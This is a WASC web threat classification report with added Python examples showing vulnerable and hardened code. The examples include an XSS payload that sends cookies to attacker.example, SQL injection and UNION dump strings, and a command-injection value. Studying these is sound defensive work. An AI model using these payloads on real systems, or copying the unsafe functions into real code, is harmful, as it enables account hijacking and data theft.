WASC Threat Classification v2.0 report

This report displays WASC threat classification issues found on your site.

Why it matters

The Web Application Security Consortium (WASC) is an international group of security experts, industry practitioners and organizational representatives that produces open, widely agreed-upon best-practice security standards for the World Wide Web.

Every web security vulnerability adds to a website's overall risk. Exploiting any given vulnerability requires at least one of a relatively small number of application attack techniques. These techniques are commonly referred to as the class of attack: the way in which a security vulnerability is exploited.

WASC web application threat classification list

Abuse of Functionality: Abuse of Functionality is an attack technique that uses a website's own features and functionality to consume its resources, defraud its users or circumvent its access control mechanisms.

Brute Force: A Brute Force attack is an automated process of trial and error used to guess a user's username, password, credit-card number or cryptographic key.

Buffer Overflow: Buffer Overflow exploits are attacks that alter the flow of an application by writing more data into a fixed-size memory buffer than it can hold, overwriting adjacent memory.

Content Spoofing: Content Spoofing is an attack technique used to trick a user into believing that certain content appearing on a website is legitimate and not from an external source.

Credential/Session Prediction: Credential/Session Prediction is a method of hijacking or impersonating a website user. The attack succeeds by deducing or guessing the unique value that identifies a particular session or user.

Cross-site Scripting: Cross-site Scripting (XSS) is an attack technique that forces a website to echo attacker-supplied executable code, which then runs in a user's browser. A user who is cross-site scripted might have their account hijacked (cookie theft), their browser redirected to another location, or be shown fraudulent content that appears to be delivered by the website they are visiting.
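The following Python is an added example, not part of this report or of the WASC definition. It shows reflected input landing in the three HTML contexts where it most often ends up (element content, attribute value, URL), with the vulnerable rendering beside the encoded one; the function names and the attacker payloads are constructed for illustration.

```python
import html
from urllib.parse import urlsplit

# Constructed attacker payloads for a hypothetical profile/search page.
NAME_PAYLOAD = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
QUERY_PAYLOAD = '" autofocus onfocus="alert(document.domain)'
LINK_PAYLOAD = "javascript:alert(document.cookie)"


def render_greeting_unsafe(name: str) -> str:
    """Element content: the name is echoed verbatim, so a <script> tag runs."""
    return f"<p>Hello {name}</p>"


def render_greeting_safe(name: str) -> str:
    """Element content: encode the HTML metacharacters before interpolating."""
    return f"<p>Hello {html.escape(name, quote=True)}</p>"


def render_search_box_unsafe(query: str) -> str:
    """Attribute value: a stray double quote lets the input add new attributes."""
    return f'<input name="q" value="{query}">'


def render_search_box_safe(query: str) -> str:
    """Attribute value: quote=True also encodes double and single quotes,
    so the attribute cannot be closed early."""
    return f'<input name="q" value="{html.escape(query, quote=True)}">'


def render_link_safe(url: str, text: str) -> str:
    """URL context: encoding does nothing against javascript: URLs, so allow-list
    the scheme first and only then encode for the attribute."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        url = "#"  # refuse anything that is not an ordinary web link
    return f'<a href="{html.escape(url, quote=True)}">{html.escape(text, quote=True)}</a>'


def has_executable_markup(rendered: str) -> bool:
    """Crude check for the demonstration: does the output still contain a live tag or handler?"""
    lowered = rendered.lower()
    return "<script" in lowered or 'onfocus="' in lowered or 'href="javascript:' in lowered


if __name__ == "__main__":
    for fn, payload in ((render_greeting_unsafe, NAME_PAYLOAD), (render_greeting_safe, NAME_PAYLOAD),
                        (render_search_box_unsafe, QUERY_PAYLOAD), (render_search_box_safe, QUERY_PAYLOAD)):
        print(f"{fn.__name__:26} executable={has_executable_markup(fn(payload))}  {fn(payload)}")
    print(render_link_safe(LINK_PAYLOAD, "click"))
```

The point of the third function is that output encoding is context-specific: html.escape is the right tool for element content and quoted attributes, but a javascript: URL survives it untouched, so the URL case needs validation of the scheme rather than encoding.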

Denial of Service: Denial of Service (DoS) is an attack technique with the intent of preventing a website from serving normal user activity.

Directory Indexing: Automatic directory listing/indexing is a web server function that lists all of the files within a requested directory when the normal base file (index.html, home.html, default.htm) is not present, exposing files that were never meant to be linked to.

Format String Attack: Format String Attacks alter the flow of an application by passing attacker-controlled input to string formatting library functions, which can then read from or write to memory the application never intended to expose.

Information Leakage: Information Leakage is when a website reveals sensitive data, such as developer comments or error messages, which might aid an attacker in exploiting the system.

Insufficient Anti-automation: Insufficient Anti-automation is when a website permits an attacker to automate a process that should only be performed manually.
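Added example, not from this report, covering the Brute Force and Insufficient Anti-automation classes together: a login routine that counts failures per account and attempts per client address, so that a guessing loop is turned away rather than allowed to run to completion. The user store, the thresholds, the PBKDF2 cost and the injectable clock are assumptions made for the illustration.

```python
import hashlib
import hmac
import secrets
import time
from typing import Callable, Dict, List, Tuple

MAX_FAILURES = 5            # consecutive failures before an account lockout
LOCKOUT_SECONDS = 15 * 60   # how long the lockout lasts
IP_WINDOW_SECONDS = 60      # sliding window for the per-client limit
IP_MAX_ATTEMPTS = 20        # attempts allowed per client address in that window
PBKDF2_ROUNDS = 50_000      # kept low for the example; use a far higher cost in production


def make_record(password: str) -> Tuple[bytes, bytes]:
    """Constructed user record: (salt, PBKDF2-HMAC-SHA256 hash)."""
    salt = secrets.token_bytes(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def verify(record: Tuple[bytes, bytes], password: str) -> bool:
    salt, expected = record
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, expected)


class LoginThrottle:
    """Tracks failures per account and attempts per client address."""

    def __init__(self, clock: Callable[[], float] = time.monotonic) -> None:
        self._clock = clock
        self._failures: Dict[str, Tuple[int, float]] = {}   # user -> (count, first failure)
        self._locked_until: Dict[str, float] = {}
        self._ip_hits: Dict[str, List[float]] = {}

    def check(self, username: str, ip: str) -> str:
        now = self._clock()
        hits = [t for t in self._ip_hits.get(ip, []) if now - t < IP_WINDOW_SECONDS]
        self._ip_hits[ip] = hits
        if len(hits) >= IP_MAX_ATTEMPTS:
            return "rate_limited"       # one client hammering many accounts
        if self._locked_until.get(username, 0.0) > now:
            return "locked"             # many guesses against one account
        return "ok"

    def record_attempt(self, ip: str) -> None:
        self._ip_hits.setdefault(ip, []).append(self._clock())

    def record_failure(self, username: str) -> None:
        now = self._clock()
        count, first = self._failures.get(username, (0, now))
        if now - first > LOCKOUT_SECONDS:        # stale streak: start counting again
            count, first = 0, now
        count += 1
        if count >= MAX_FAILURES:
            self._locked_until[username] = now + LOCKOUT_SECONDS
            self._failures.pop(username, None)
        else:
            self._failures[username] = (count, first)

    def record_success(self, username: str) -> None:
        self._failures.pop(username, None)


# Dummy record so unknown usernames cost the same time as real ones (no enumeration by timing).
_DUMMY = make_record(secrets.token_hex(8))


def login(users: Dict[str, Tuple[bytes, bytes]], throttle: LoginThrottle,
          username: str, password: str, ip: str) -> str:
    """Returns 'ok', 'denied', 'locked' or 'rate_limited'."""
    status = throttle.check(username, ip)
    if status != "ok":
        return status                   # no password check at all while throttled
    throttle.record_attempt(ip)
    record = users.get(username, _DUMMY)
    ok = verify(record, password) and username in users   # verify() always runs
    if ok:
        throttle.record_success(username)
        return "ok"
    throttle.record_failure(username)
    return "denied"
```

The two counters answer different attacks: the per-account lockout stops a long password list against one victim, and the per-address window stops password spraying (one common password tried across many accounts), which never trips a per-account counter.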

Insufficient Authentication: Insufficient Authentication occurs when a website permits an attacker to access sensitive content or functionality without first properly verifying the user's identity.

Insufficient Authorization: Insufficient Authorization is when a website permits access to sensitive content or functionality that should require stricter access control restrictions than were applied; the user may be authenticated, but has not been checked for permission to perform that particular action on that particular resource.
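Added example (not from this report) contrasting the two classes above: the same invoice lookup with no identity check at all, with a login check but no ownership check, and with both. The Invoice and Session types, the sample data and the "finance" role are assumptions made for the illustration.

```python
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass(frozen=True)
class Invoice:
    invoice_id: int
    owner: str
    amount: float


@dataclass(frozen=True)
class Session:
    user: Optional[str]          # None for an anonymous visitor
    role: str = "customer"


# Constructed sample data: two customers, one invoice each.
INVOICES: Dict[int, Invoice] = {
    1001: Invoice(1001, "alice", 42.0),
    1002: Invoice(1002, "bob", 99.5),
}


class AuthenticationRequired(Exception):
    pass


class Forbidden(Exception):
    pass


def get_invoice_no_auth(session: Session, invoice_id: int) -> Invoice:
    """Insufficient Authentication: sensitive data returned to anyone who asks."""
    return INVOICES[invoice_id]


def get_invoice_login_only(session: Session, invoice_id: int) -> Invoice:
    """Insufficient Authorization: checks THAT the caller is logged in, not WHO they are.
    Any customer can read any invoice just by changing the id in the URL."""
    if session.user is None:
        raise AuthenticationRequired()
    return INVOICES[invoice_id]


def get_invoice(session: Session, invoice_id: int) -> Invoice:
    """Both checks: identity first, then ownership (or an explicitly privileged role)."""
    if session.user is None:
        raise AuthenticationRequired()
    invoice = INVOICES.get(invoice_id)
    if invoice is None or (invoice.owner != session.user and session.role != "finance"):
        # Same answer for "not yours" and "does not exist", so ids cannot be enumerated.
        raise Forbidden()
    return invoice
```

The authorization check is made on the object, not the endpoint: being allowed to call "get invoice" says nothing about which invoices the caller may see.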

Insufficient Process Validation: Insufficient Process Validation is when a website permits an attacker to bypass or circumvent the intended flow control of an application.

Insufficient Session Expiration: Insufficient Session Expiration is when a website permits an attacker to reuse old session credentials or session IDs for authorization. Insufficient Session Expiration increases a website's exposure to attacks that steal or impersonate other users.

LDAP Injection: LDAP Injection is an attack technique used to exploit websites that construct Lightweight Directory Access Protocol (LDAP) statements from user-supplied input.

OS Commanding: OS Commanding is an attack technique used to exploit websites by executing Operating System commands through manipulation of application input.
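Added example, not from this report, of the OS Commanding class: a hypothetical "check this host" feature implemented three ways. The shell string, the quoted shell string and the argv list with an allow-list are shown side by side; echo stands in for the real network tool so the example runs anywhere with a POSIX shell, and the hostname pattern and names are assumptions.

```python
import re
import shlex
import subprocess

# Allow-list for the only kind of value the feature needs: a DNS hostname.
# Labels may not begin with '-', which also keeps the value from being read as an option.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

# Constructed attacker input for the form field.
MALICIOUS_HOST = "127.0.0.1; echo INJECTED"


def is_valid_hostname(host: str) -> bool:
    return HOSTNAME_RE.match(host) is not None


def check_host_unsafe(host: str) -> str:
    """shell=True hands the whole string to /bin/sh, so ';' starts a second command."""
    return subprocess.run("echo checking " + host, shell=True,
                          capture_output=True, text=True).stdout


def check_host_quoted(host: str) -> str:
    """If a shell is unavoidable, shlex.quote turns the value into one literal word."""
    return subprocess.run("echo checking " + shlex.quote(host), shell=True,
                          capture_output=True, text=True).stdout


def check_host_safe(host: str) -> str:
    """Preferred: validate against the allow-list, then pass an argv list with no shell at all."""
    if not is_valid_hostname(host):
        raise ValueError(f"rejected hostname: {host!r}")
    return subprocess.run(["echo", "checking", host],
                          capture_output=True, text=True).stdout


if __name__ == "__main__":
    print("unsafe :", repr(check_host_unsafe(MALICIOUS_HOST)))
    print("quoted :", repr(check_host_quoted(MALICIOUS_HOST)))
    print("safe   :", repr(check_host_safe("example.com")))
```

Quoting fixes the shell metacharacter problem but not argument injection, which is why the argv-list version also validates the value before it reaches the program.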

Path Traversal: The Path Traversal attack technique gives access to files, directories and commands that may be located outside the document root directory. An attacker might manipulate a URL, typically with ../ sequences, so that the website runs or reveals the contents of arbitrary files anywhere on the web server.
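Added example, not from this report, of the Path Traversal class: a file-serving function that joins the requested name onto the document root without checking it, beside one that decodes once, canonicalizes and confirms the result is still under the root. The temporary directory tree, the secret file and the function names are constructed for the illustration.

```python
import os
import tempfile
from pathlib import Path
from typing import Optional
from urllib.parse import unquote


def build_docroot() -> Path:
    """Constructed sample tree: a document root plus a secret file just outside it."""
    base = Path(tempfile.mkdtemp())
    docroot = base / "www"
    (docroot / "img").mkdir(parents=True)
    (docroot / "index.html").write_text("<h1>home</h1>")
    (docroot / "img" / "logo.txt").write_text("LOGO")
    (base / "secret.conf").write_text("db_password=hunter2")
    try:
        os.symlink(base / "secret.conf", docroot / "link.txt")   # a link pointing outside
    except OSError:
        pass   # platform without symlink support; that case is simply not exercised
    return docroot


def read_unsafe(docroot: Path, requested: str) -> str:
    """os.path.join keeps '..' segments, so the path walks straight out of docroot."""
    return Path(os.path.join(docroot, unquote(requested))).read_text()


def resolve_safe(docroot: Path, requested: str) -> Optional[Path]:
    """Decode once (as the server would), anchor under docroot, canonicalize, then check containment."""
    base = Path(docroot).resolve()
    relative = unquote(requested).lstrip("/\\")   # a leading separator must not make it absolute
    target = (base / relative).resolve()           # collapses '..' and follows symlinks
    if target != base and base not in target.parents:
        return None
    return target


def read_safe(docroot: Path, requested: str) -> str:
    target = resolve_safe(docroot, requested)
    if target is None or not target.is_file():
        raise PermissionError(f"refusing to serve {requested!r}")
    return target.read_text()


def can_serve(docroot: Path, requested: str) -> bool:
    try:
        read_safe(docroot, requested)
        return True
    except PermissionError:
        return False
```

Resolving before the containment check is what defeats both dot-dot segments and symlinks; comparing the raw string against a prefix would miss the symlink case entirely. Decoding exactly once mirrors what the web server does, so a double-encoded %252e is treated as the literal file name it would be on disk.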

Predictable Resource Location: Predictable Resource Location is an attack technique used to uncover hidden website content and functionality. It is a brute-force search driven by educated guesses for content that is not intended for public viewing. Temporary files, backup files, configuration files and sample files are all examples of files that are commonly left behind and found this way.

Session Fixation: Session Fixation is an attack technique that forces a user's session ID to an explicit value known to the attacker; once the victim authenticates under that ID, the attacker can present it and act as the victim.
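The following Python is an added example, not from this report, serving the Credential/Session Prediction, Insufficient Session Expiration and Session Fixation classes above: a predictable session id beside a random one, a store that enforces idle and absolute timeouts on the server side, and a login step that rotates the id so a fixated value is never promoted to an authenticated session. The timeouts, the injectable clock and the names are assumptions made for the illustration.

```python
import secrets
import time
from typing import Callable, Dict, Optional

IDLE_TIMEOUT = 30 * 60            # seconds of inactivity before a session dies
ABSOLUTE_TIMEOUT = 8 * 60 * 60    # hard ceiling regardless of activity


def predictable_session_id(counter: int) -> str:
    """The kind of id Credential/Session Prediction feeds on: one observed value reveals the next."""
    return format(counter, "08x")


def next_predictable_id(observed: str) -> str:
    """What an attacker does with an observed predictable id."""
    return format(int(observed, 16) + 1, "08x")


def random_session_id() -> str:
    """256 bits from the OS CSPRNG: nothing to extrapolate from."""
    return secrets.token_urlsafe(32)


class SessionStore:
    def __init__(self, clock: Callable[[], float] = time.time) -> None:
        self._clock = clock
        self._sessions: Dict[str, dict] = {}

    def create(self) -> str:
        sid = random_session_id()
        now = self._clock()
        self._sessions[sid] = {"user": None, "created": now, "last_seen": now}
        return sid

    def get(self, sid: str) -> Optional[dict]:
        """The session if it exists and is within both timeouts; otherwise it is dropped."""
        session = self._sessions.get(sid)
        if session is None:
            return None
        now = self._clock()
        if now - session["last_seen"] > IDLE_TIMEOUT or now - session["created"] > ABSOLUTE_TIMEOUT:
            del self._sessions[sid]   # server-side invalidation, not just a cookie expiry
            return None
        session["last_seen"] = now
        return session

    def login(self, presented_sid: Optional[str], user: str) -> str:
        """Rotate the id on privilege change: the pre-login id, which the attacker may have
        chosen, is discarded and a fresh one is bound to the authenticated user."""
        if presented_sid is not None:
            self._sessions.pop(presented_sid, None)
        sid = self.create()
        self._sessions[sid]["user"] = user
        return sid

    def logout(self, sid: str) -> None:
        self._sessions.pop(sid, None)
```

The absolute timeout matters even when the idle timeout is in place: a stolen session that is kept warm by periodic requests would otherwise live forever.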

SQL Injection: SQL Injection is an attack technique used to exploit websites that construct SQL statements from user-supplied input.
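Added example, not from this report, of the SQL Injection class using Python's built-in sqlite3: a lookup that concatenates the username into the statement beside the same lookup with a bound parameter, plus the one case parameters cannot cover (a column name in ORDER BY), handled with an allow-list. The table, the sample rows and their placeholder password hashes are constructed for the illustration.

```python
import sqlite3
from typing import List, Tuple

# Constructed sample data; the "hashes" are placeholder strings, not real digests.
SAMPLE_USERS = [
    ("alice", "pbkdf2$1$alicehash", "admin"),
    ("bob", "pbkdf2$1$bobhash", "user"),
    ("carol", "pbkdf2$1$carolhash", "user"),
]

# Sort keys the UI may send, mapped to the only column names we will ever interpolate.
SORTABLE_COLUMNS = {"name": "username", "role": "role", "id": "id"}


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, "
                 "password_hash TEXT NOT NULL, role TEXT NOT NULL)")
    conn.executemany("INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def find_user_unsafe(conn: sqlite3.Connection, username: str) -> List[Tuple[str, str]]:
    """String concatenation: the input becomes part of the SQL grammar."""
    sql = "SELECT username, role FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str) -> List[Tuple[str, str]]:
    """Bound parameter: the input is only ever a value, never SQL."""
    return conn.execute("SELECT username, role FROM users WHERE username = ?", (username,)).fetchall()


def list_users_sorted(conn: sqlite3.Connection, sort_key: str) -> List[Tuple[int, str]]:
    """Identifiers cannot be bound as parameters, so map user input onto an allow-list instead."""
    column = SORTABLE_COLUMNS.get(sort_key)
    if column is None:
        raise ValueError(f"unsupported sort key: {sort_key!r}")
    return conn.execute(f"SELECT id, username FROM users ORDER BY {column}").fetchall()


if __name__ == "__main__":
    db = setup_db()
    print("bypass :", find_user_unsafe(db, "' OR '1'='1"))
    print("dump   :", find_user_unsafe(db, "x' UNION SELECT username, password_hash FROM users--"))
    print("safe   :", find_user_safe(db, "' OR '1'='1"))
```

The second payload shows why the class matters beyond authentication bypass: a UNION lets the attacker read any column of any table the application's database account can see, here the password hashes.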

SSI Injection: SSI Injection (Server-side Include) is a server-side exploit technique that allows an attacker to send code into an application, which the web server later executes locally.

Weak Password Recovery Validation: Weak Password Recovery Validation is when a website permits an attacker to illegally obtain, change or recover another user's password.
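Added example, not from this report, of the controls whose absence makes up the Weak Password Recovery Validation class: reset tokens that are unguessable, stored only as a digest, bound to one account, time-limited, single-use and superseded by any later request. The service, the time-to-live and the injectable clock are assumptions made for the illustration.

```python
import hashlib
import hmac
import secrets
import time
from typing import Callable, Dict, Tuple

RESET_TOKEN_TTL = 15 * 60   # seconds a reset link stays valid


class PasswordResetService:
    """Issues and redeems single-use, time-limited reset tokens bound to one account."""

    def __init__(self, clock: Callable[[], float] = time.time) -> None:
        self._clock = clock
        # token digest -> (username, expiry). Only the SHA-256 of the token is kept,
        # so reading the table does not hand out usable tokens.
        self._pending: Dict[bytes, Tuple[str, float]] = {}

    @staticmethod
    def _digest(token: str) -> bytes:
        return hashlib.sha256(token.encode()).digest()

    def request_reset(self, username: str) -> str:
        token = secrets.token_urlsafe(32)   # never derived from the username, the time or a counter
        # A new request invalidates earlier tokens for the same account.
        for digest, (user, _) in list(self._pending.items()):
            if user == username:
                del self._pending[digest]
        self._pending[self._digest(token)] = (username, self._clock() + RESET_TOKEN_TTL)
        # In practice the token is sent to the address already on file, never shown to the requester.
        return token

    def redeem(self, username: str, token: str) -> bool:
        """True exactly once, only for the account the token was issued to, and only before expiry."""
        digest = self._digest(token)
        entry = self._pending.get(digest)
        if entry is None:
            return False
        user, expires_at = entry
        if self._clock() > expires_at:
            del self._pending[digest]        # expired tokens are purged, not left to accumulate
            return False
        if not hmac.compare_digest(user.encode(), username.encode()):
            return False                     # token exists but belongs to a different account
        del self._pending[digest]            # single use
        return True
```

Looking the token up by its digest rather than comparing the raw value means the stored table is useless to anyone who reads it, and the constant-time username comparison keeps the account binding from leaking through response timing.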

XPath Injection: XPath Injection is an attack technique used to exploit websites that construct XPath queries from user-supplied input.